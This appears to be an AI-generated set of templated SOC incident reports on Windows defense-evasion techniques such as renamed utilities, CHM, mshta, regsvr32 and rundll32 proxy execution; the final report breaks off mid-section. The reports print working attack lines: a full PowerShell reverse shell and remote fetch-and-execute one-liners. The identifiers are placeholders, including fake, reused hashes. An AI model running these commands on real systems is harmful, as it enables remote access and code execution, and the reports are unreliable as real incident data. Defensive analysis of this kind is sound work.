Ready for your next batch of prompts whenever you are.
Batch 31: Defense Evasion & Masquerading Incident Reports
Here are the next 5 detailed SOC incident reports.
151. T1027.005 – Indicator Removal from Tools (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-INDICATOR-REMOVAL-1027-7842 Alert Time: 2024-03-09 09:30:15 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Known Malicious Tool with Altered Indicators Detected” MITRE ATT&CK: T1027.005 – Obfuscated Files or Information: Indicator Removal from Tools
Alert Details:
Detection: Mimikatz executable with modified PE characteristics (stripped of original indicators)
Host: ENG-WS-045 (Engineering Workstation) User: rpatel@company.com (Raj Patel, Engineer) File: C:\Users\rpatel\Downloads\legit_tool.exe SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 File Size: 845 KB (original Mimikatz is 1.2 MB)
Analysis:
File is a variant of Mimikatz (credential dumping tool)
Original PE metadata removed:
No version information
No digital signature
No original filename
PE timestamp: 1970-01-01 (nulled)
Import Address Table (IAT) obfuscated
Strings: many Mimikatz-specific strings removed or encrypted
Behavioral detection: attempts to access LSASS process
Detection Logic:
Behavioral pattern matches Mimikatz (OpenProcess on lsass.exe)
File hash not in known threat intel (new variant)
PE characteristics stripped (indicator removal)
Machine learning (ML) score: 92/100 for malware
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed Mimikatz-like behavior with stripped indicators
2. File Analysis
Submit to sandbox
CrowdStrike Falcon Sandbox
Unpacked and identified as Mimikatz 2.2.0 variant
3. Process Investigation
Identify source of file
CrowdStrike
Downloaded from hacking forum via Chrome
4. User Interview
Contact rpatel
Teams, Phone
User downloaded “security testing tool” – unauthorized
5. Immediate Action
Delete file and kill process
CrowdStrike Live Response
File removed; no LSASS access occurred
6. User Remediation
User counseling
Manager, HR
Policy violation documented
Jira Incident Report
Ticket: SOC-2024-191 Summary: T1027.005 – Stripped Mimikatz Variant (Indicator Removal) Status: RESOLVED Resolution: POLICY VIOLATION – Tool Removed Priority: P3 – LOW Labels: T1027, indicator-removal, mimikatz, crowdstrike, policy-violation Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Known Malicious Tool with Altered Indicators Detected”.
Host: ENG-WS-045 (Engineering, user rpatel).
File: C:\Users\rpatel\Downloads\legit_tool.exe (stripped Mimikatz).
Time: 2024-03-09 09:30 EST.
Technique: MITRE ATT&CK T1027.005 – Obfuscated Files or Information: Indicator Removal from Tools.
2. Technical Analysis:
File Analysis:
Original Mimikatz: 1.2 MB, with version info, signed by “Gentil Kiwi” (often self-signed)
This Variant: 845 KB, stripped of all metadata
No version information
No original filename
PE timestamp set to 0 (1970-01-01)
Import Address Table obfuscated (dynamic resolution)
Many strings encrypted (only decrypted at runtime)
Behavioral Analysis:
Attempted to open process lsass.exe (PID: 568) with PROCESS_ALL_ACCESS
Attempted to read memory of lsass.exe (blocked by PPL – Protected Process Light)
No credentials dumped
User Intent:
User downloaded “legit_tool.exe” from a hacking forum for “learning purposes”
Unaware that it was a stripped version of Mimikatz
No malicious intent against company
Policy Violation:
Unauthorized use of credential dumping tool
Violation of acceptable use policy
3. Investigation Findings:
Timeline:
09:15 – File downloaded
09:20 – User executed file
09:22 – LSASS access attempt
09:30 – CrowdStrike alert
09:32 – SOC investigates
09:35 – File deleted, user interviewed
Indicators of Compromise (IoCs):
File:
– C:\Users\rpatel\Downloads\legit_tool.exe (SHA256: a1b2c3d4…)
Behavior:
– OpenProcess on lsass.exe
– Stripped PE metadata
4. Containment Actions:
Immediate Actions:
Deleted the file.
Terminated any associated processes.
No LSASS compromise.
User Remediation:
User counseled on policy.
Required to complete security training.
5. Root Cause Analysis:
Primary Cause: User curiosity about security tools led to downloading unauthorized software.
Contributing Factors:
No application control.
User unaware of policy.
6. Business Impact:
Operational Impact: None.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Tool removed.
User educated.
Technical Controls Enhanced:
Implemented application control to block known hacking tools.
Enhanced monitoring for LSASS access attempts.
8. Conclusion:
A user downloaded a stripped version of Mimikatz that evaded signature-based detection by removing indicators. CrowdStrike’s behavioral detection identified the LSASS access attempt and enabled removal. No credentials were compromised.
Closure Rationale: Tool removed; user educated; policy violation documented.
Analyst: [Your Name], SOC Analyst Date: 2024-03-09 10:30 EST
152. T1036.003 – Rename System Utilities (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-RENAME-UTIL-1036-7842 Alert Time: 2024-03-09 14:15:33 EST Severity: HIGH (85/100) Source: Sysmon (Event ID 1 – Process Creation) Rule: “Suspicious Process Name – System Utility Renamed” MITRE ATT&CK: T1036.003 – Masquerading: Rename System Utilities
Alert Details:
Event ID: 1 (Process Creation) Time: 14:10 EST Host: FIN-WS-078 (Finance Workstation) User: bturner@company.com (Brian Turner, Accountant)
Process Tree:
explorer.exe (PID: 2341)
svchost.exe (PID: 4789)
Path: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Command Line: “C:\Users\bturner\AppData\Local\Temp\svchost.exe” -k netsvcs
Original Name: cmd.exe (renamed to svchost.exe)
File Details:
File: C:\Users\bturner\AppData\Local\Temp\svchost.exe
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
File is actually cmd.exe (renamed)
Verified by comparing hash with known cmd.exe hash (after extraction)
Detection Logic:
Process named “svchost.exe” running from Temp folder (anomalous)
File hash matches cmd.exe (system utility)
Process name does not match actual executable (renamed)
Parent process is explorer.exe (unusual for svchost.exe)
Pattern matches masquerading (rename system utility to evade detection)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon event
Splunk, Sysmon Logs
Confirmed renamed cmd.exe as svchost.exe
2. Process Investigation
Identify source of renamed file
CrowdStrike Falcon
File dropped by malicious script from phishing email
3. User Interview
Contact bturner
Teams, Phone
User opened “invoice.doc” with macro
4. Immediate Action
Terminate process, delete file
CrowdStrike
Process killed; file removed
5. Email Investigation
Find source email
Proofpoint, Exchange
Email quarantined; attachment malicious
6. Account Remediation
Reset bturner password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-192 Summary: T1036.003 – Renamed cmd.exe to svchost.exe for Masquerading Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1036, rename-utilities, masquerading, sysmon, phishing Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1.
Alert: “Suspicious Process Name – System Utility Renamed”.
Host: FIN-WS-078 (Finance, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\svchost.exe (actually cmd.exe).
Time: 2024-03-09 14:15 EST.
Technique: MITRE ATT&CK T1036.003 – Masquerading: Rename System Utilities.
2. Technical Analysis:
Attack Chain:
13:45 – User opens phishing email with “invoice.doc”
13:46 – Macro executes, downloads script
13:50 – Script copies cmd.exe to Temp as svchost.exe
14:00 – Script executes renamed cmd.exe with parameters
14:10 – Process runs; Sysmon detects
Masquerading Technique:
Original: C:\Windows\System32\cmd.exe
Renamed: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Purpose: To appear as a legitimate svchost.exe process
Command: Used to launch PowerShell (encoded) for C2
Malicious Activity:
The renamed cmd.exe launched PowerShell with encoded command
PowerShell attempted to connect to 185.143.221[.]89:443 (blocked)
No further compromise
User Status:
User unaware; clicked attachment
3. Investigation Findings:
Timeline:
13:45 – Phishing email opened
13:46-13:50 – Malware drops renamed cmd.exe
14:00 – Execution
14:10 – Sysmon alert
14:12 – SOC investigates
14:13 – Process terminated
14:14 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\svchost.exe (renamed cmd.exe)
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated process.
Deleted renamed executable.
Isolated host temporarily.
Reset user password.
Enforced MFA.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: Phishing email with malicious macro.
Contributing Factors:
Macros enabled.
User had local admin rights.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block process creations originating from PSExec and WMI”.
Enhanced monitoring for renamed system utilities.
8. Conclusion:
An attacker used a renamed cmd.exe (masquerading as svchost.exe) to evade detection. Sysmon identified the process name mismatch and enabled rapid termination.
Closure Rationale: Process terminated; file removed; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-09 15:30 EST
153. T1036.005 – Match Legitimate Name or Location (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-MATCH-NAME-LOC-1036-7842 Alert Time: 2024-03-09 11:30:22 EST Severity: HIGH (88/100) Source: CrowdStrike Falcon EDR Rule: “Process with System Name Running from User-Writable Path” MITRE ATT&CK: T1036.005 – Masquerading: Match Legitimate Name or Location
Alert Details:
Detection: Process named “svchost.exe” running from C:\Users\Public\
Host: HR-WS-023 (HR Workstation) User: kwilson@company.com (Karen Wilson, HR) Process: C:\Users\Public\svchost.exe (PID: 4789) Command Line: C:\Users\Public\svchost.exe -k rpcss Time: 11:25 EST
File Details:
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Digital Signature: None (legitimate svchost.exe is signed by Microsoft)
File Size: 312 KB (legitimate svchost.exe is ~45 KB)
Creation Time: 11:20 EST
Detection Logic:
Process name matches legitimate system binary (svchost.exe)
Running from user-writable path (C:\Users\Public) – anomalous
No digital signature (expected signed)
Parent process: explorer.exe (unusual for svchost.exe)
Pattern matches masquerading (malware posing as svchost.exe)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed svchost.exe from Public folder
2. File Analysis
Analyze svchost.exe
CrowdStrike Sandbox
Malicious executable (Cobalt Strike loader)
3. Process Investigation
Identify source
CrowdStrike
Downloaded via drive-by download from compromised site
4. User Interview
Contact kwilson
Teams, Phone
User visited news site, got pop-up; ran file
5. Immediate Action
Terminate process, delete file
CrowdStrike
Process killed; file removed
6. Account Remediation
Reset kwilson password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-193 Summary: T1036.005 – Malware Masquerading as svchost.exe in Public Folder Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1036, match-name-location, masquerading, svchost, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process with System Name Running from User-Writable Path”.
Host: HR-WS-023 (HR, user kwilson).
Process: C:\Users\Public\svchost.exe.
Time: 2024-03-09 11:30 EST.
Technique: MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location.
2. Technical Analysis:
Attack Chain:
11:00 – User visits news-site.com (compromised)
11:05 – Fake “Chrome update” pop-up appears
11:06 – User clicks, downloads “ChromeUpdate.exe” (actually svchost.exe)
11:10 – User runs downloaded file
11:15 – Malware copies itself to C:\Users\Public\svchost.exe
11:20 – Malware executes from new location
11:25 – CrowdStrike detects
Masquerading Details:
Name: svchost.exe (legitimate Windows service host)
Location: C:\Users\Public\ (user-writable, not system path)
Expected Location: C:\Windows\System32\
File Size: 312 KB (vs legitimate ~45 KB)
Unsigned
Malware Analysis:
Type: Cobalt Strike loader
C2: 185.143.221[.]89:443
Persistence: Scheduled task “WindowsUpdate”
User Status:
User thought it was Chrome update
Unaware of malware
3. Investigation Findings:
Timeline:
11:00 – Compromised site visited
11:06 – Fake download
11:10 – Execution
11:15 – Moved to Public folder
11:20 – Execution from Public
11:25 – Alert
11:27 – SOC investigates
11:28 – Process terminated, file deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\Public\svchost.exe (SHA256: a1b2c3d4…)
– C:\Users\kwilson\Downloads\ChromeUpdate.exe
Scheduled Task:
– “WindowsUpdate”
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated process.
Deleted malicious file.
Removed scheduled task.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User tricked by fake Chrome update.
Contributing Factors:
No application control.
User unaware of drive-by download risks.
6. Business Impact:
Operational Impact: HR workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Technical Controls Enhanced:
Enhanced browser isolation for high-risk sites.
Created alert for system processes from user-writable paths.
8. Conclusion:
An attacker used a malware masquerading as svchost.exe in a user-writable location to evade detection. CrowdStrike detected the anomalous path and enabled rapid removal.
Closure Rationale: Malware removed; user educated; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-09 12:30 EST
154. T1218.001 – Compiled HTML File (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-CHM-EXEC-1218-7842 Alert Time: 2024-03-09 16:30:45 EST Severity: HIGH (85/100) Source: Microsoft Defender for Endpoint Rule: “Compiled HTML File (CHM) Executing Suspicious Code” MITRE ATT&CK: T1218.001 – System Binary Proxy Execution: Compiled HTML File
Alert Details:
Detection: CHM file executed with script that spawns PowerShell
Host: SALES-WS-023 (Sales Workstation) User: mwilson@company.com (Mike Wilson, Sales Rep) File: C:\Users\mwilson\Downloads\Help_Document.chm Time: 16:25 EST
Process Tree:
explorer.exe (PID: 2341)
hh.exe (HTML Help executable) (PID: 4789)
cmd.exe (PID: 4792)
powershell.exe (PID: 4795)
Command: powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==
CHM File Analysis:
File: Help_Document.chm
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Contains HTML with embedded JavaScript
JavaScript decodes and executes PowerShell command
Detection Logic:
hh.exe (legitimate CHM viewer) spawning cmd.exe and powershell.exe (unusual)
CHM file from Downloads folder (external source)
Encoded PowerShell command (reverse shell)
Pattern matches CHM-based execution bypass
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed CHM execution with PowerShell
2. File Analysis
Analyze CHM file
Defender Sandbox
Malicious CHM with script to download Cobalt Strike
3. User Interview
Contact mwilson
Teams, Phone
User opened CHM from email attachment
4. Immediate Action
Terminate processes
Defender
hh.exe, cmd.exe, powershell.exe killed
5. Email Investigation
Find source email
Proofpoint, Exchange
Email quarantined; attachment malicious
6. Account Remediation
Reset mwilson password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-194 Summary: T1218.001 – Malicious CHM File Executes PowerShell Reverse Shell Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, chm, compiled-html-file, defender, phishing Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Compiled HTML File (CHM) Executing Suspicious Code”.
Host: SALES-WS-023 (Sales, user mwilson).
File: C:\Users\mwilson\Downloads\Help_Document.chm.
Time: 2024-03-09 16:30 EST.
Technique: MITRE ATT&CK T1218.001 – System Binary Proxy Execution: Compiled HTML File.
2. Technical Analysis:
Attack Chain:
16:00 – User receives phishing email with “Help_Document.chm”
16:05 – User opens attachment (CHM file)
16:06 – hh.exe launches, loads CHM
16:07 – CHM contains JavaScript that executes PowerShell
16:08 – PowerShell connects to C2 (185.143.221[.]89:443)
16:25 – Defender detects
CHM Exploitation:
Method: CHM files can contain HTML with scripts that run when opened
hh.exe is a trusted Windows binary (often allowed)
Bypass: Executes malicious code through trusted process
PowerShell Command (decoded):
$client = New-Object System.Net.Sockets.TCPClient(‘192.168.34.56’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Impact:
C2 connection established
Attacker had access for ~17 minutes
3. Investigation Findings:
Timeline:
16:00 – Email received
16:05 – CHM opened
16:08 – C2 connection
16:25 – Alert
16:27 – SOC investigates
16:28 – Processes terminated
Indicators of Compromise (IoCs):
Files:
– Help_Document.chm (SHA256: a1b2c3d4…)
Network:
– C2: 192.168.34.56:443 (internal pivot)
– External: 185.143.221[.]89 (from other host logs)
Processes:
– hh.exe -> cmd.exe -> powershell.exe
4. Containment Actions:
Immediate Actions:
Terminated hh.exe, cmd.exe, powershell.exe.
Deleted CHM file.
Isolated host.
Reset user password.
Enforced MFA.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User opened malicious CHM attachment.
Contributing Factors:
CHM files allowed as email attachments.
No ASR rule blocking hh.exe child processes.
6. Business Impact:
Operational Impact: Sales workstation offline for 2 hours.
Data Exposure: System information only.
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Technical Controls Enhanced:
Blocked CHM attachments via email gateway.
Enabled ASR rule “Block executable content from email client and webmail”.
Enhanced monitoring for hh.exe spawning child processes.
8. Conclusion:
An attacker used a CHM file to execute a PowerShell reverse shell via hh.exe, a trusted Windows binary. Defender detected the anomalous process chain and enabled rapid termination.
Closure Rationale: Malware terminated; host cleaned; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-09 17:30 EST
155. T1218.005 – Mshta Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-Mshta-Proxy-1218-7842 Alert Time: 2024-03-09 10:30:22 EST Severity: HIGH (88/100) Source: CrowdStrike Falcon EDR Rule: “Mshta.exe Executing Suspicious Script – Potential Proxy Execution” MITRE ATT&CK: T1218.005 – System Binary Proxy Execution: Mshta
Alert Details:
Detection: Mshta.exe (HTML Application host) executing script from remote URL
Host: DEV-WS-045 (Development Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 10:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
mshta.exe (PID: 4792)
Command: mshta.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1”);h.Open(“GET”,”http://185.143.221[.]89/payload.hta”,false);h.Send();eval(h.responseText)
Detection Logic:
Mshta.exe executing JavaScript (unusual for this user)
Script downloads and executes HTA payload from remote URL
Parent process cmd.exe (unusual for mshta.exe)
Destination IP known malicious
Pattern matches mshta proxy execution (commonly used for malware)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed mshta.exe downloading remote script
2. URL Analysis
Analyze payload URL
URLScan.io, VirusTotal
HTA file contains PowerShell download cradle
3. Process Investigation
Identify source
CrowdStrike
User clicked link in email; cmd.exe launched mshta
4. User Interview
Contact alexchen
Teams, Phone
User clicked “document” link; unaware
5. Immediate Action
Terminate mshta.exe
CrowdStrike
Process killed
6. Network Block
Block malicious URL
Palo Alto, Zscaler
URL and IP blocked
Jira Incident Report
Ticket: SOC-2024-195 Summary: T1218.005 – Mshta Proxy Execution of Remote Payload Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, mshta, proxy-execution, crowdstrike, phishing Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Mshta.exe Executing Suspicious Script – Potential Proxy Execution”.
Host: DEV-WS-045 (Development, user alexchen).
Process: mshta.exe with JavaScript downloading remote HTA.
Time: 2024-03-09 10:30 EST.
Technique: MITRE ATT&CK T1218.005 – System Binary Proxy Execution: Mshta.
2. Technical Analysis:
Attack Chain:
10:10 – User receives phishing email with link
10:12 – User clicks link (to malicious HTA)
10:13 – Browser downloads .hta file (or directly triggers mshta)
10:14 – cmd.exe launches mshta with JavaScript
10:15 – mshta downloads additional payload from 185.143.221[.]89
10:25 – CrowdStrike detects
Mshta Technique:
Mshta.exe is a legitimate Microsoft binary for running HTML Applications
Abuse: Can execute JavaScript/VBScript to download and run malware
Bypass: Often allowed by application whitelisting
Payload Analysis:
URL: http://185.143.221[.]89/payload.hta
Content: HTA file with embedded PowerShell script
PowerShell: Downloads and executes Cobalt Strike beacon
Impact:
Malware attempted to execute (blocked before full execution)
3. Investigation Findings:
Timeline:
10:10 – Email received
10:12 – Link clicked
10:14-10:15 – mshta execution
10:25 – Alert
10:27 – SOC investigates
10:28 – Process terminated
10:29 – URL blocked
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload.hta
– IP: 185.143.221[.]89
Processes:
– mshta.exe with JavaScript
4. Containment Actions:
Immediate Actions:
Terminated mshta.exe.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Mshta allowed to execute scripts.
6. Business Impact:
Operational Impact: Development workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Blocked mshta.exe from executing script content via AppLocker.
Enhanced URL filtering.
Created alert for mshta with command-line script.
8. Conclusion:
An attacker used mshta.exe to download and execute a malicious HTA payload, leveraging a trusted Windows binary. CrowdStrike detected the anomalous behavior and terminated the process before full compromise.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-09 11:30 EST
End of Batch 31
Ready for your next batch of prompts whenever you are.
Batch 32: Defense Evasion & Credential Access Incident Reports
Here are the next 5 detailed SOC incident reports.
156. T1218.010 – Regsvr32 Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-REGSVR32-PROXY-1218-7842 Alert Time: 2024-03-10 09:30:15 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo” MITRE ATT&CK: T1218.010 – System Binary Proxy Execution: Regsvr32
Alert Details:
Detection: Regsvr32.exe used to execute remote scriptlet (Squiblydoo technique)
Host: FIN-WS-078 (Finance Workstation) User: bturner@company.com (Brian Turner, Accountant) Time: 09:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
regsvr32.exe (PID: 4792)
Command: regsvr32.exe /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll
Command Line: regsvr32 /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll
Detection Logic:
Regsvr32.exe used with /i flag pointing to remote URL (anomalous)
Downloading scriptlet (.sct) from external IP
scrobj.dll (COM scriptlet) loaded
Parent process cmd.exe (unusual for legitimate regsvr32 usage)
Pattern matches “Squiblydoo” technique for executing arbitrary code via trusted binary
Additional Context:
User received phishing email with link earlier
URL payload.sct contains malicious script
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed regsvr32 remote scriptlet execution
2. URL Analysis
Fetch and analyze payload.sct
URLScan.io, Sandbox
SCT file contains PowerShell download cradle
3. Process Investigation
Identify source
CrowdStrike
User clicked link in email, launched cmd
4. User Interview
Contact bturner
Teams, Phone
User clicked “document” link; unaware
5. Immediate Action
Terminate regsvr32 process
CrowdStrike
Process killed
6. Network Block
Block malicious URL
Palo Alto, Zscaler
URL and IP blocked
Jira Incident Report
Ticket: SOC-2024-196 Summary: T1218.010 – Regsvr32 Squiblydoo Technique Executing Remote Scriptlet Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, regsvr32, squiblydoo, proxy-execution, crowdstrike Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo”.
Host: FIN-WS-078 (Finance, user bturner).
Process: regsvr32.exe with remote scriptlet.
Time: 2024-03-10 09:30 EST.
Technique: MITRE ATT&CK T1218.010 – System Binary Proxy Execution: Regsvr32.
2. Technical Analysis:
Attack Chain:
09:10 – User receives phishing email with link
09:12 – User clicks link
09:13 – Browser triggers cmd.exe (or downloads script that launches cmd)
09:14 – cmd.exe launches regsvr32 with remote scriptlet URL
09:15 – regsvr32 downloads payload.sct from 185.143.221[.]89
09:20 – Scriptlet executes PowerShell (downloading Cobalt Strike)
09:25 – CrowdStrike detects
Regsvr32 Technique:
Binary: C:\Windows\System32\regsvr32.exe (trusted, often allowed)
Flags: /s (silent), /n (no register), /u (unregister), /i:
DLL: scrobj.dll (COM scriptlet handler)
Effect: Downloads and executes scriptlet (.sct) which can contain arbitrary script
Payload Analysis:
URL: http://185.143.221[.]89/payload.sct
Content: XML scriptlet with embedded VBScript that runs PowerShell
PowerShell: Downloads and executes Cobalt Strike beacon
Impact:
Scriptlet executed before detection
C2 connection attempted (blocked)
3. Investigation Findings:
Timeline:
09:10 – Email received
09:12 – Link clicked
09:14-09:20 – Scriptlet download and execution
09:25 – Alert
09:27 – SOC investigates
09:28 – Process terminated
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload.sct
– IP: 185.143.221[.]89
Processes:
– regsvr32.exe with /i flag to remote URL
4. Containment Actions:
Immediate Actions:
Terminated regsvr32 process.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Regsvr32 allowed to download remote content.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Blocked regsvr32 from making outbound connections via firewall.
Enhanced URL filtering.
Created alert for regsvr32 with /i flag.
8. Conclusion:
An attacker used regsvr32.exe with the Squiblydoo technique to download and execute a malicious scriptlet, bypassing application whitelisting. CrowdStrike detected the anomalous behavior and terminated the process.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 10:30 EST
157. T1218.011 – Rundll32 Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-PROXY-1218-7842 Alert Time: 2024-03-10 14:15:33 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo” MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32
Alert Details:
Detection: Rundll32.exe executing JavaScript from remote URL
Host: ENG-WS-045 (Engineering Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 14:10 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
rundll32.exe (PID: 4792)
Command: rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1”);h.Open(“GET”,”http://185.143.221[.]89/payload”,false);h.Send();eval(h.responseText)
Detection Logic:
Rundll32.exe executing JavaScript (unusual)
JavaScript downloads and executes payload from remote URL
Parent process cmd.exe (unusual for rundll32)
Destination IP known malicious
Pattern matches rundll32 proxy execution
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed rundll32 JavaScript execution
2. URL Analysis
Analyze payload URL
URLScan.io, VirusTotal
Payload contains PowerShell reverse shell
3. Process Investigation
Identify source
CrowdStrike
User clicked link in email
4. User Interview
Contact alexchen
Teams, Phone
User clicked “report” link; unaware
5. Immediate Action
Terminate rundll32 process
CrowdStrike
Process killed
6. Network Block
Block malicious URL
Palo Alto, Zscaler
URL and IP blocked
Jira Incident Report
Ticket: SOC-2024-197 Summary: T1218.011 – Rundll32 JavaScript Proxy Execution Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, rundll32, proxy-execution, crowdstrike, phishing Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: rundll32.exe with JavaScript executing remote payload.
Time: 2024-03-10 14:15 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.
2. Technical Analysis:
Attack Chain:
14:00 – User receives phishing email with link
14:02 – User clicks link
14:03 – Browser triggers cmd.exe
14:04 – cmd.exe launches rundll32 with JavaScript
14:05 – JavaScript downloads payload from 185.143.221[.]89
14:06 – Payload executes PowerShell reverse shell
14:10 – CrowdStrike detects
Rundll32 Technique:
Binary: C:\Windows\System32\rundll32.exe (trusted)
